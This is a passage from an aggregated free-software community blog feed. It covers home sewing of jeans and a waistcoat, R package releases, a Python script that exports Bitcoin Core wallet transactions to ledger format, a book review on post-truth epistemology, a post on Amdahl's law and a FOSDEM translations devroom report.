a <em>peculiar</em> look.</p>
<p>Also, I had to cut the back on the fold, rather than having a seam in
the middle and the grain on a different angle.</p>
<p>Anyway, my next waistcoat project is going to have a linen-cotton lining
and silk fashion fabric, and I’d say that the pattern is good enough
that I can do a few small fixes and cut it directly in the lining, using
it as a second mockup.</p>
<p>As for the wrinkles, there is quite a bit, but it looks like something that
will be solved by a bit of lightweight boning in the side seams and in
the front; it will be seen in the second mockup and the finished
waistcoat.</p>
<p>As for this one, it’s definitely going to get some wear as is, in casual
contexts. Except. Well, it’s a denim waistcoat, right? With a very
different cut from the “get a denim jacket and rip out the sleeves”, but
still a denim waistcoat, right? The kind that you cover in patches,
right?</p>
<p><img alt="Outline of a sewing machine with teeth and crossed bones below it, and the text “home sewing is killing fashion / and it's illegal”" class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/Homesewing.svg" style="width: 80.0%;" /></p>
<p>And I may have screenprinted a “home sewing is killing fashion” patch
some time ago, using <a href="https://commons.wikimedia.org/wiki/File:Homesewing.svg">the SVG from wikimedia commons</a> / the <a href="https://en.wikipedia.org/wiki/Home_Taping_Is_Killing_Music">Home
Taping is Killing Music</a> page.</p>
<p>And. Maybe I’ll wait until I have finished the real waistcoat. But I
suspect that one, and other sewing / costuming patches may happen in the
future.</p>
<p>No regrets, as the words on my seam ripper pin say, right? :D</p>
</section>
</article>2024-03-08T00:00:00+00:00Elena “of Valhalla”Dirk Eddelbuettel: prrd 0.0.6 at CRAN: Several Improvements
http://dirk.eddelbuettel.com/blog/2024/03/07#prrd_0.0.6
<p>Thrilled to share that a new version of <a href="https://dirk.eddelbuettel.com/code/prrd.html">prrd</a> arrived at
<a href="https://cran.r-project.org">CRAN</a> yesterday in a first
update in two and a half years. <a href="https://dirk.eddelbuettel.com/code/prrd.html">prrd</a> facilitates
the <em>parallel running [of] reverse dependency [checks]</em> when
preparing R packages. It is used extensively for releases I make of <a href="https://www.rcpp.org">Rcpp</a>, <a href="https://dirk.eddelbuettel.com/code/rcpp.armadillo.html">RcppArmadillo</a>,
<a href="https://dirk.eddelbuettel.com/code/rcpp.eigen.html">RcppEigen</a>,
<a href="https://dirk.eddelbuettel.com/code/bh.html">BH</a>, and
others.</p>
<p><img alt="prrd screenshot image" src="https://github.com/eddelbuettel/prrd/raw/master/local/screenshot_prrd_rcpparmadillo.png" style="float: left; margin: 10px 10px 10px 0;" width="700" /></p>
<p>The key idea of <a href="https://dirk.eddelbuettel.com/code/prrd.html">prrd</a> is simple,
and described in some more detail on <a href="https://dirk.eddelbuettel.com/code/prrd.html">its webpage</a> and
its <a href="https://github.com/eddelbuettel/prrd">GitHub repo</a>.
Reverse dependency checks are an important part of package development
that is easily done in a (serial) loop. But these checks are also
generally <em>embarrassingly parallel</em> as there is no or little
interdependency between them (besides maybe shared build dependencies).
See the (dated) screenshot (running six parallel workers, arranged in a
split <a href="https://byobu.org">byobu</a> session).</p>
<p>This release, the first since 2021, brings a number of enhancements.
In particular, the summary function is now improved in several ways. <a href="https://github.com/joshuaulrich/">Josh</a> also put in a nice PR
that generalizes some setup defaults and values.</p>
<p>The release is summarised in the NEWS entry:</p>
<blockquote>
<h4 id="changes-in-prrd-version-0.0.6-2024-03-06">Changes in prrd
version 0.0.6 (2024-03-06)</h4>
<ul>
<li><p>The summary function has received several enhancements:</p>
<ul>
<li><p>Extended summary is only running when failures are seen.</p></li>
<li><p>The <code>summariseQueue</code> function now displays an
anticipated completion time and remaining duration.</p></li>
<li><p>The use of optional package <span class="pkg">foghorn</span> has
been refined, and refactored, when running summaries.</p></li>
</ul></li>
<li><p>The <code>dequeueJobs.r</code> scripts can receive a date
argument; the date can be parsed via <code>anydate</code> if <span class="pkg">anytime</span> is present.</p></li>
<li><p>The <code>enqueueJobs.r</code> script now considers skipped packages when
running 'addfailed' while ensuring selected packages are still on
CRAN.</p></li>
<li><p>The CI setup has been updated (twice).</p></li>
<li><p>Enqueing and dequing functions and scripts now support relative
directories, updated documentation (<a href="https://github.com/eddelbuettel/prrd/pull/18">#18</a> by Joshua
Ulrich).</p></li>
</ul>
</blockquote>
<p>Courtesy of my <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>, there
is also a diffstat report for <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/06#prrd_0.0.6">this
release</a>.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>2024-03-07T23:05:00+00:00Dirk EddelbuettelPetter Reinholdtsen: Plain text accounting file from your bitcoin transactions
https://people.skolelinux.org/pere/blog/Plain_text_accounting_file_from_your_bitcoin_transactions.html
<p>A while back I wrote a small script to extract the Bitcoin
transactions in a wallet in the
ledger plain text accounting
format. The last few days I spent some time to get it working
better with more special cases. In case it can be useful for others,
here is a copy:</p>
<p></p><blockquote><pre>#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (c) 2023-2024 Petter Reinholdtsen

from decimal import Decimal
import json
import subprocess
import time

import numpy

def format_float(num):
    return numpy.format_float_positional(num, trim='-')

accounts = {
    u'amount' : 'Assets:BTC:main',
}

addresses = {
    '' : 'Assets:bankkonto',
    '' : 'Assets:bankkonto',
}

def exec_json(cmd):
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
    j = json.loads(proc.communicate()[0], parse_float=Decimal)
    return j

def list_txs():
    # get all transactions for all accounts / addresses
    c = 0
    txs = []
    txidfee = {}
    limit = 100000
    cmd = ['bitcoin-cli', 'listtransactions', '*', str(limit)]
    if True:
        txs.extend(exec_json(cmd))
    else:
        # Useful for debugging
        with open('transactions.json') as f:
            txs.extend(json.load(f, parse_float=Decimal))
    #print txs
    for tx in sorted(txs, key=lambda a: a['time']):
        # print tx['category']
        if 'abandoned' in tx and tx['abandoned']:
            continue
        if 'confirmations' in tx and 0 >= tx['confirmations']:
            continue
        when = time.strftime('%Y-%m-%d %H:%M', time.localtime(tx['time']))
        if 'message' in tx:
            desc = tx['message']
        elif 'comment' in tx:
            desc = tx['comment']
        elif 'label' in tx:
            desc = tx['label']
        else:
            desc = 'n/a'
        print("%s %s" % (when, desc))
        if 'address' in tx:
            print(" ; to bitcoin address %s" % tx['address'])
        else:
            print(" ; missing address in transaction, txid=%s" % tx['txid'])
        print(f" ; amount={tx['amount']}")
        if 'fee' in tx:
            print(f" ; fee={tx['fee']}")
        for f in accounts.keys():
            if f in tx and Decimal(0) != tx[f]:
                amount = tx[f]
                print(" %-20s %s BTC" % (accounts[f], format_float(amount)))
        if 'fee' in tx and Decimal(0) != tx['fee']:
            # Make sure to list fee used in several transactions only once.
            if tx['txid'] in txidfee and tx['fee'] == txidfee[tx['txid']]:
                pass  # fee for this txid was already listed
            else:
                fee = tx['fee']
                print(" %-20s %s BTC" % (accounts['amount'], format_float(fee)))
                print(" %-20s %s BTC" % ('Expences:BTC-fee', format_float(-fee)))
                txidfee[tx['txid']] = tx['fee']
        if 'address' in tx and tx['address'] in addresses:
            print(" %s" % addresses[tx['address']])
        else:
            if 'generate' == tx['category']:
                print(" Income:BTC-mining")
            elif amount < Decimal(0):
                print(f" Assets:unknown:sent:update-script-addr-{tx['address']}")
            else:
                print(f" Assets:unknown:received:update-script-addr-{tx['address']}")
        print()
        c = c + 1
    print("# Found %d transactions" % c)
    if limit == c:
        print(f"# Warning: Limit {limit} reached, consider increasing limit.")

def main():
    list_txs()

main()
</pre></blockquote><p></p>
<p>It is more of a proof of concept, and I do not expect it to handle
all edge cases, but it worked for me, and perhaps you can find it
useful too.</p>
<p>To get a more interesting result, it is useful to map the accounts sent
to or received from onto accounting accounts, using the
<tt>addresses</tt> hash. As these will be very context dependent, I
leave out my list to allow each user to fill in their own list of
accounts. Out of the box, 'ledger reg BTC:main' should be able to
show the amount of BTC present in the wallet at any given time in the
past. For other and more valuable analyses, an account plan needs to be
set up in the <tt>addresses</tt> hash. Here is an example
transaction:</p>
<p></p><blockquote><pre>2024-03-07 17:00 Donated to good cause
 Assets:BTC:main      -0.1 BTC
 Assets:BTC:main      -0.00001 BTC
 Expences:BTC-fee     0.00001 BTC
 Expences:donations   0.1 BTC
</pre></blockquote><p></p>
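<p>As an illustration of how the <tt>addresses</tt> hash can be filled in, here is a minimal sketch; the bitcoin addresses and account names below are made up for illustration and are not from the script above:</p>

```python
# Hypothetical mapping from bitcoin addresses to ledger accounts; both the
# addresses and the account names are invented examples.
addresses = {
    '1ExampleExchangeAddress': 'Assets:exchange',
    '1ExampleDonationAddress': 'Expences:donations',
}

def account_for(address):
    """Return the mapped ledger account, or an 'unknown' placeholder
    account that reminds you to update the mapping."""
    return addresses.get(address, f'Assets:unknown:update-script-addr-{address}')

print(account_for('1ExampleDonationAddress'))  # Expences:donations
print(account_for('1SomeUnmappedAddress'))     # Assets:unknown:update-script-addr-1SomeUnmappedAddress
```

Unmapped addresses thus still produce a valid posting, and the placeholder account name tells you which entry to add to the hash next.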
<p>It needs a running Bitcoin Core daemon, as it connects to it
using <tt>bitcoin-cli listtransactions * 100000</tt> to extract the
transactions listed in the wallet.</p>
<p>As usual, if you use Bitcoin and want to show your support of my
activities, please send Bitcoin donations to my address
<b><a>15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b</a></b>.</p>2024-03-07T17:00:00+00:00Petter ReinholdtsenGuido Günther: Phosh Nightly Package Builds
https://phosh.mobi/posts/phosh-nightly/
Tightening the feedback loop: One thing we notice every so often is that although Phosh’s source code is publicly available and upcoming changes are open for review, the feedback loop between changes being made to the development branch and users noticing the change can still be quite long.
This can be problematic as we ideally want to catch a regression or broken use case triggered by a change on the development branch (aka main) before the general availability of a new version.2024-03-07T14:19:30+00:00Guido GüntherGunnar Wolf: Constructed truths — truth and knowledge in a post-truth world
https://gwolf.org/2024/03/constructed-truths-truth-and-knowledge-in-a-post-truth-world.html
<blockquote>
This post is a review for <a href="https://www.computingreviews.com/">Computing Reviews</a>
for <em><a href="https://link.springer.com/book/10.1007/978-3-658-39942-9">Constructed truths — truth and knowledge in a post-truth world</a></em>
, a book
published in <em><a href="https://www.computingreviews.com/review/review_review.cfm?review_id=147722">Springer Link</a></em>
</blockquote>
<p>Many of us grew up used to having some news sources we could implicitly trust, such as well-positioned newspapers and radio or TV news programs. We knew they would only hire responsible journalists rather than risk diluting public trust and losing their brand’s value. However, with the advent of the Internet and social media, we are witnessing what has been termed the “post-truth” phenomenon. The undeniable freedom that horizontal communication has given us automatically brings with it the emergence of filter bubbles and echo chambers, and truth seems to become a group belief.</p>
<p>Contrary to my original expectations, the core topic of the book is not about how current-day media brings about post-truth mindsets. Instead it goes into a much deeper philosophical debate: What is truth? Does truth exist by itself, objectively, or is it a social construct? If activists with different political leanings debate a given subject, is it even possible for them to understand the same points for debate, or do they truly experience parallel realities?</p>
<p>The author wrote this book clearly prompted by the unprecedented events that took place in 2020, as the COVID-19 crisis forced humanity into isolation and online communication. Donald Trump is explicitly and repeatedly presented throughout the book as an example of an actor that took advantage of the distortions caused by post-truth.</p>
<p>The first chapter frames the narrative from the perspective of information flow over the last several decades, on how the emergence of horizontal, uncensored communication free of editorial oversight started empowering the “netizens” and created a temporary information flow utopia. But soon afterwards, “algorithmic gatekeepers” started appearing, creating a set of personalized distortions on reality; users started getting news aligned to what they already showed interest in. This led to an increase in polarization and the growth of narrative-framing-specific communities that served as echo chambers for disjoint views on reality. This led to the growth of conspiracy theories and, necessarily, to the science denial and pseudoscience that reached unimaginable peaks during the COVID-19 crisis. Finally, when readers decide based on completely subjective criteria whether a scientific theory such as global warming is true or propaganda, or question what most traditional news outlets present as facts, we face the phenomenon known as “fake news.” Fake news leads to “post-truth,” a state where it is impossible to distinguish between truth and falsehood, and serves only a rhetorical function, making rational discourse impossible.</p>
<p>Toward the end of the first chapter, the tone of writing quickly turns away from describing developments in the spread of news and facts over the last decades and quickly goes deep into philosophy, into the very thorny subject pursued by said discipline for millennia: How can “truth” be defined? Can different perspectives bring about different truth values for any given idea? Does truth depend on the observer, on their knowledge of facts, on their moral compass or in their honest opinions?</p>
<p>Zoglauer dives into epistemology, following various thinkers’ ideas on what can be understood as truth: constructivism (whether knowledge and truth values can be learnt by an individual building from their personal experience), objectivity (whether experiences, and thus truth, are universal, or whether they are naturally individual), and whether we can proclaim something to be true when it corresponds to reality. For the final chapter, he dives into the role information and knowledge play in assigning and understanding truth value, as well as the value of second-hand knowledge: Do we really “own” knowledge because we can look up facts online (even if we carefully check the sources)? Can I, without any medical training, diagnose a sickness and treatment by honestly and carefully looking up its symptoms in medical databases?</p>
<p>Wrapping up, while I very much enjoyed reading this book, I must confess it is completely different from what I expected. This book digs much more into the abstract than into information flow in modern society, or the impact on early 2020s politics as its editorial description suggests. At 160 pages, the book is not a heavy read, and Zoglauer’s writing style is easy to follow, even across the potentially very deep topics it presents. Its main readership is not necessarily computing practitioners or academics. However, for people trying to better understand epistemology through its expressions in the modern world, it will be a very worthy read.</p>2024-03-07T01:08:10+00:00Gunnar WolfValhalla's Things: Jeans, step two. And three. And four.
https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/index.html
<article>
<section class="header">
Posted on March 7, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/FreeSoftWear.html" title="All pages tagged 'FreeSoftWear'.">FreeSoftWear</a>
</section>
<section>
<p><img alt="A woman wearing a regular pair of slim-cut black denim jeans." class="align-center" src="https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/denim_jeans_front.jpg" style="width: 80.0%;" /></p>
<p>I was working on what looked like a good pattern for a pair of
jeans-shaped trousers, and I knew I wasn’t happy with 200-ish g/m²
cotton-linen for general use outside of deep summer, but I didn’t have a
source for proper denim either (I had been low-key looking for it for a
long time).</p>
<p>Then one day I looked at an article I had saved about fabric shops that
sell technical fabric and while window-shopping on one I found that they
had a decent selection of denim in a decent weight.</p>
<p>I took it as a sign, and decided to buy the two heaviest denims they
had: a <a href="https://www.tessutoattivo.it/Jeany-12.5oz-Denim-Jeans-Tessuto-Nero">100% cotton, 355 g/m² one</a>
and a <a href="https://www.tessutoattivo.it/Selwyn-Denim-autentico-Elastico-Nero">97% cotton, 3% elastane at 385 g/m²</a>
<a class="footnote-ref" href="https://blog.trueelena.org#fn1" id="fnref1"><sup>1</sup></a>; the latter was a bit of a compromise as I shouldn’t really be
buying fabric adulterated with the Scourge of Humanity, but it was
heavier than the plain one, and I may be having a thing for tightly
fitting jeans, so this may be one of the very few woven fabric where I’m
not morally opposed to its existence.</p>
<p>And, I’d like to add, I resisted buying any of the very nice wools they
also seem to carry, other than just a couple of samples.</p>
<p>Since the shop only sold in 1 meter increments, and I needed about 1.5
meters for each pair of jeans, I decided to buy 3 meters per type, and
have enough to make a total of four pairs of jeans. A bit more than I
strictly needed, maybe, but I was completely out of wearable day-to-day
trousers.</p>
<p><img alt="a cardboard box with neatly folded black denim, covered in semi-transparent plastic." class="align-center" src="https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/a_box_of_denim.jpg" style="width: 80.0%;" /></p>
<p>The shop sent everything very quickly, the courier took their time (oh,
well) but eventually delivered my fabric on a sunny enough day that I
could wash it and start as soon as possible on the first pair.</p>
<p>The pattern I did in linen was a bit too fitting, but I was afraid I had
widened it a bit too much, so I did the first pair in the 100% cotton
denim. Sewing them took me about a week of early mornings and late
afternoons, excluding the weekend, and my worries proved false: they
were mostly just fine.</p>
<p>The only bit that could have been a bit better is the waistband, which
is a tiny bit too wide on the back: it’s designed to be so for comfort,
but the next time I should pull the elastic a bit more, so that it stays
closer to the body.</p>
<p><img alt="The same from the back, showing the applied pockets with a sewn logo." class="align-center" src="https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/denim_jeans_back.jpg" style="width: 80.0%;" /></p>
<p>I wore those jeans daily for the rest of the week, and confirmed that
they were indeed comfortable and the pattern was ok, so on the next
Monday I started to cut the elastic denim.</p>
<p>I decided to cut and sew two pairs, assembly-line style, using the
shaped waistband for one of them and the straight one for the other one.</p>
<p>I started working on them on a Monday, and on that week I had a couple
of days when I just couldn’t, plus I completely skipped sewing on the
weekend, but on Tuesday the next week one pair was ready and could be
worn, and the other one only needed small finishes.</p>
<p><img alt="A woman wearing another pair of jeans; the waistband here is shaped to fit rather than having elastic." class="align-center" src="https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/shaped_waistband_jeans.jpg" style="width: 80.0%;" /></p>
<p>And I have to say, I’m really, really happy with the ones with a shaped
waistband in elastic denim, as they fit even better than the ones with a
straight waistband gathered with elastic. Cutting it requires more
fabric, but I think it’s definitely worth it.</p>
<p>But it will be a problem for a later time: right now three pairs of
jeans are a good number to keep in rotation, and I hope I won’t have to
sew jeans for myself for quite some time.</p>
<p><img alt="A plastic bag with mid-sized offcuts of denim; there is a 30 cm ruler on top that is just wider than the bag" class="align-center" src="https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/denim_leftovers.jpg" style="width: 80.0%;" /></p>
<p>I think that the leftovers of plain denim will be used for a skirt or
something else, and as for the leftovers of elastic denim, well, there
aren’t a lot left, but what else I did with them is the topic for
another post.</p>
<p>Thanks to the fact that they are all slightly different, I’ve started to
keep track of the times when I wash each pair, and hopefully I will be
able to see whether the elastic denim is significantly less durable than
the regular, or the added weight compensates for it somewhat. I’m not
sure I’ll manage to remember about saving the data until they get worn,
but if I do it will be interesting to know.</p>
<p>Oh, and I say I’ve finished working on jeans and everything, but I still
haven’t sewn the belt loops to the third pair. And I’m currently wearing
them. It’s a sewist tradition, or something. :D</p>
<section class="footnotes footnotes-end-of-document">
<hr />
<ol>
<li id="fn1"><p>The links are to the shop for Italy; you can copy the
“Codice prodotto” and look for it on one of the shop’s versions for
other countries (where they apply the right VAT etc., but sadly they
don’t allow mixing and matching those settings and the language).<a class="footnote-back" href="https://blog.trueelena.org#fnref1">↩︎</a></p></li>
</ol>
</section>
</section>
</article>2024-03-07T00:00:00+00:00Elena “of Valhalla”Steinar H. Gunderson: Reverse Amdahl's Law
http://blog.sesse.net/blog/tech/2024-03-06-17-39_reverse_amdahls_law.html
<p>Everybody working in performance knows <a href="https://en.wikipedia.org/wiki/Amdahl%27s_law">Amdahl's law</a>,
and it is usually framed as a negative result; if you optimize
(in most formulations, parallelize) a part of an operation,
you gain diminishing results after a while. (When optimizing a
given fraction p of the total time T by a speedup factor s,
the new time taken is (1-p)T + pT/s.)</p>
<p>However, Amdahl's law also works beautifully in reverse!
When you optimize something, there's usually some limit where
a given optimization isn't worth it anymore; I usually put this
around 1% or so, although of course it varies with the cost of
the optimization and such. (Most people would count 1% as ridiculously
low, but it's usually how mature systems go; you rarely find
single 30% speedups, but you can often find ten smaller speedups and apply
them sequentially. SQLite famously <a href="https://www.sqlite.org/cpu.html">tripled their speed</a>
by chaining optimizations so tiny that they needed to run in a simulator
to measure them.) And as your total runtime becomes smaller,
things that used to not be worth it now pop over that threshold!
If you have enough developer resources and no real upper limit
for how much performance you would want, you can keep going forever.</p>
<p>A different way to look at it is that optimizations give you
compound interest; if measuring in terms of throughput instead
of latency (i.e., items per second instead of seconds per item),
which I contend is the only reasonable way to express performance
percentages, you can simply multiply the factors together.[1] So 1%
and then 1% means 1.01 * 1.01 = 1.0201, a 2.01% speedup and not
2%. Thirty 1% optimizations compound to 34.8%, not 30%.</p>
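<p>The compounding arithmetic is easy to check; a quick sketch of the thirty-factor example:</p>

```python
from math import prod

# Chained throughput improvements multiply rather than add.
factors = [1.01] * 30                 # thirty independent 1% speedups
total = prod(factors)                 # about 1.3478
print(f"{(total - 1) * 100:.1f}%")    # prints 34.8%, not 30%
```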
<p>So here's my formulation of Amdahl's law, in a more positive
light: The more you speed up a given part of a system, the more
impactful optimizations in the other parts will be. So go forth
and fire up those profilers :-)</p>
<p>[1] Obviously throughput measurements are inappropriate if
what you care about is e.g. 99p latency. It is still better to
talk about a 50% speedup than removing 33% of the latency,
though, especially as the speedup factor gets higher.</p>2024-03-06T16:39:00+00:00Steinar H. GundersonPaulo Henrique de Lima Santana: Bits from FOSDEM 2023 and 2024
http://phls.com.br/bits-from-fosdem-2023-and-2024
<p><a href="https://phls.com.br/minha-participacao-nos-fosdem-2023-e-2024">Link para versão em português</a></p>
<h1 id="intro">Intro</h1>
<p>Since 2019, I have traveled to Brussels at the beginning of the year to join <a href="https://fosdem.org/2024/">FOSDEM</a>, considered the largest and most important Free Software event in Europe. The 2024 edition was the fourth in-person edition in a row that I joined (2021 and 2022 did not happen due to COVID-19), always with the financial help of Debian, which kindly paid for my flight tickets after my travel funding request was approved by the Debian Leader.</p>
<p>In 2020 I wrote <a href="https://phls.com.br/viagem-de-curitiba-para-bruxelas">several posts</a> with a very complete report of the days I spent in Brussels. But in 2023 I didn’t write anything, and because last year and this year I coordinated a room dedicated to translations of Free Software and Open Source projects, I’m going to take the opportunity to write about these two years and my experience.</p>
<p>After my first trip to FOSDEM, I started to think that I could join in a more active way than just as a regular attendee, so I wanted to propose a talk for one of the rooms. But then I thought that instead of proposing a talk, I could organize a room for talks :-) on the topic of “translations”, which is something I’m very interested in, since I’ve been helping to translate Debian into Portuguese for a few years now.</p>
<h1 id="joining-fosdem-2023">Joining FOSDEM 2023</h1>
<p>In the second half of 2022 I did some research and saw that there had never been a room dedicated to translations, so when the FOSDEM organization opened the <a href="https://archive.fosdem.org/2023/news/2022-09-29-call_for_devrooms/">call</a> to receive room proposals (called DevRooms) for the 2023 edition, I sent a proposal for a translations room and it was <a href="https://archive.fosdem.org/2023/news/2022-11-07-accepted-developer-rooms/">accepted</a>!</p>
<p>After the room was confirmed, the next step was for me, as room coordinator, to publicize the <a href="https://lists.fosdem.org/pipermail/fosdem/2022q4/003441.html">call for talk proposals</a>. I spent a few weeks wondering whether I would receive a good number of proposals or whether it would be a failure. But to my happiness, I received eight proposals, and due to time constraints I had to select six for the <a href="https://archive.fosdem.org/2023/schedule/track/translations/">room schedule</a>.</p>
<p><a href="https://archive.fosdem.org/2023">FOSDEM 2023</a> took place from February 4th to 5th and the translation devroom was scheduled on the second day in the afternoon.</p>
<p><img alt="Fosdem 2023" src="https://phls.com.br/assets/img/fosdem-2023-063.jpg" /></p>
<p>The talks held in the room are listed below; for each one you can watch the video recording.</p>
<ul>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_welcome_to_the_translations_devroom/">Welcome to the Translations DevRoom</a>.
<ul>
<li>Paulo Henrique de Lima Santana</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_translate_all_the_things/">Translate All The Things!</a> An Introduction to LibreTranslate.
<ul>
<li>Piero Toffanin</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_bringing_your_project_closer_to_users_translating_libre_with_weblate/">Bringing your project closer to users - translating libre with Weblate</a>. News, features and plans of the project.
<ul>
<li>Benjamin Alan Jamie</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_20_years_with_gettext/">20 years with Gettext</a>. Experiences from the PostgreSQL project.
<ul>
<li>Peter Eisentraut</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_building_an_atractive_way_in_an_old_infra_for_new_translators/">Building an atractive way in an old infra for new translators</a>.
<ul>
<li>Texou</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_managing_kdes_translation_project/">Managing KDE’s translation project</a>. Are we the biggest FLOSS translation project?
<ul>
<li>Albert Astals Cid</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_translating_documentation_with_cloud_tools_and_scripts/">Translating documentation with cloud tools and scripts</a>. Using cloud tools and scripts to translate, review and update documents.
<ul>
<li>Nilo Coutinho Menezes</li>
</ul>
</li>
</ul>
<p>And on the first day of FOSDEM I was at the Debian stand selling the t-shirts I had brought from Brazil. People from France were also there selling other products, and it was cool to interact with people who visited the booth to buy something and/or talk about Debian.</p>
<p><br />
<img alt="Fosdem 2023" src="https://phls.com.br/assets/img/fosdem-2023-016.jpg" />
<br /><br />
<img alt="Fosdem 2023" src="https://phls.com.br/assets/img/fosdem-2023-019.jpg" />
<br /></p>
<p><a href="https://photos.app.goo.gl/fB6wH37b2pFBqiNZ9">Photos</a></p>
<h1 id="joining-fosdem-2024">Joining FOSDEM 2024</h1>
<p>The 2023 result motivated me to propose the translations devroom again when the FOSDEM 2024 organization opened the <a href="https://fosdem.org/2024/news/2023-09-29-devrooms-cfp/">call for rooms</a>. I was waiting to find out if the FOSDEM organization would accept a room on this topic for the second year in a row, and to my delight, my proposal was <a href="https://fosdem.org/2024/news/2023-11-08-devrooms-announced/">accepted</a> again :-)</p>
<p>This time I received 11 proposals! And again due to time constraints, I had to select six for the <a href="https://fosdem.org/2024/schedule/track/translations/">room schedule</a>.</p>
<p><a href="https://fosdem.org/2024/">FOSDEM 2024</a> took place from February 3rd to 4th and the translation devroom was scheduled for the second day again, but this time in the morning.</p>
<p>The talks held in the room are listed below; for each one you can watch the video recording.</p>
<ul>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3516-welcome-to-the-translations-devroom/">Welcome to the Translations DevRoom</a>.
<ul>
<li>Paulo Henrique de Lima Santana</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2624-localization-of-open-source-tools-into-swahili/">Localization of Open Source Tools into Swahili</a>.
<ul>
<li>Cecilia Maundu</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-1759-a-universal-data-model-for-localizable-messages/">A universal data model for localizable messages</a>.
<ul>
<li>Eemeli Aro</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3236-happy-translating-it-is-possible-to-overcome-the-language-barrier-in-open-source-/">Happy translating! It is possible to overcome the language barrier in Open Source!</a>
<ul>
<li>Wentao Liu</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-1906-lessons-learnt-as-a-translation-contributor-the-past-4-years/">Lessons learnt as a translation contributor the past 4 years</a>.
<ul>
<li>Tom De Moor</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2071-long-term-effort-to-keep-translations-up-to-date/">Long Term Effort to Keep Translations Up-To-Date</a>.
<ul>
<li>Andika Triwidada</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3348-using-open-source-ais-for-accessibility-and-localization/">Using Open Source AIs for Accessibility and Localization</a>.
<ul>
<li>Nevin Daniel</li>
</ul>
</li>
</ul>
<p>This time I didn’t help at the Debian stand because I couldn’t bring t-shirts from Brazil to sell. So I just stopped by and talked to some of the people who were there, including some Debian Developers. But I volunteered for a few hours to operate the streaming camera in one of the main rooms.</p>
<p><br />
<img alt="Fosdem 2024" src="https://phls.com.br/assets/img/fotos-fosdem-2024-037.jpg" />
<br /><br />
<img alt="Fosdem 2024" src="https://phls.com.br/assets/img/fotos-fosdem-2024-015.jpg" />
<br /></p>
<p><a href="https://photos.app.goo.gl/KrSvUFYTGkzb9kfz5">Photos</a></p>
<h1 id="conclusion">Conclusion</h1>
<p>The topics of the talks in these two years were quite diverse, and all the talks were really very good. Across the 12 talks we could see how translations happen in projects such as KDE, PostgreSQL, Debian and Mattermost. We had presentations of tools such as LibreTranslate and Weblate, as well as scripts, AI, and a data model for localizable messages. And also reports on the work carried out by communities in Africa, China and Indonesia.</p>
<p>The rooms were full for some talks and emptier for others, but I was very satisfied with the final result of these two years.</p>
<p>I leave my special thanks to <a href="https://jonathancarter.org/">Jonathan Carter</a>, the Debian Leader who approved my flight ticket requests so that I could join FOSDEM 2023 and 2024. This help was essential to make my trips to Brussels possible, because flight tickets are not cheap at all.</p>
<p>I would also like to thank my wife Jandira, who has been my travel partner :-)</p>
<p><img alt="Bruxelas" src="https://phls.com.br/assets/img/bruxelas-2023-187.jpg" /></p>
<p>As there has been an increase in the number of proposals received, I believe that interest in the translations devroom is growing. So I intend to send the devroom proposal to FOSDEM 2025, and if it is accepted, wait for the future Debian Leader to approve helping me with the flight tickets again. We’ll see.</p>2024-03-04T23:50:00+00:00Paulo Henrique de Lima SantanaDirk Eddelbuettel: tinythemes 0.0.2 at CRAN: Maintenance
http://dirk.eddelbuettel.com/blog/2024/03/04#tinythemes_0.0.2
<p>A first maintenance of the still fairly new package <a href="https://github.com/eddelbuettel/tinythemes">tinythemes</a> arrived
on <a href="https://cran.r-project.org">CRAN</a> today. <a href="https://github.com/eddelbuettel/tinythemes">tinythemes</a>
provides the <code>theme_ipsum_rc()</code> function from <a href="https://github.com/hrbrmstr/hrbrthemes">hrbrthemes</a> by <a href="https://rud.is/">Bob Rudis</a> in a zero (added) dependency way. A
simple example (also available as a demo inside the package)
contrasts the default style (on the left) with the one added by this
package (on the right):</p>
<p><img src="https://eddelbuettel.github.io/images/2023-12-18/tinythemes_demo.png" style="width: 99.0%;" /></p>
<p>This version mostly just updates to the newest releases of <a href="https://cran.r-project.org/package=ggplot2">ggplot2</a> as one
must, and takes advantage of Bob’s update to <a href="https://github.com/hrbrmstr/hrbrthemes">hrbrthemes</a>
yesterday.</p>
<p>The full set of changes since the initial <a href="https://cran.r-project.org">CRAN</a> release follows.</p>
<blockquote>
<h4 id="changes-in-spdl-version-0.0.2-2024-03-04">Changes in tinythemes
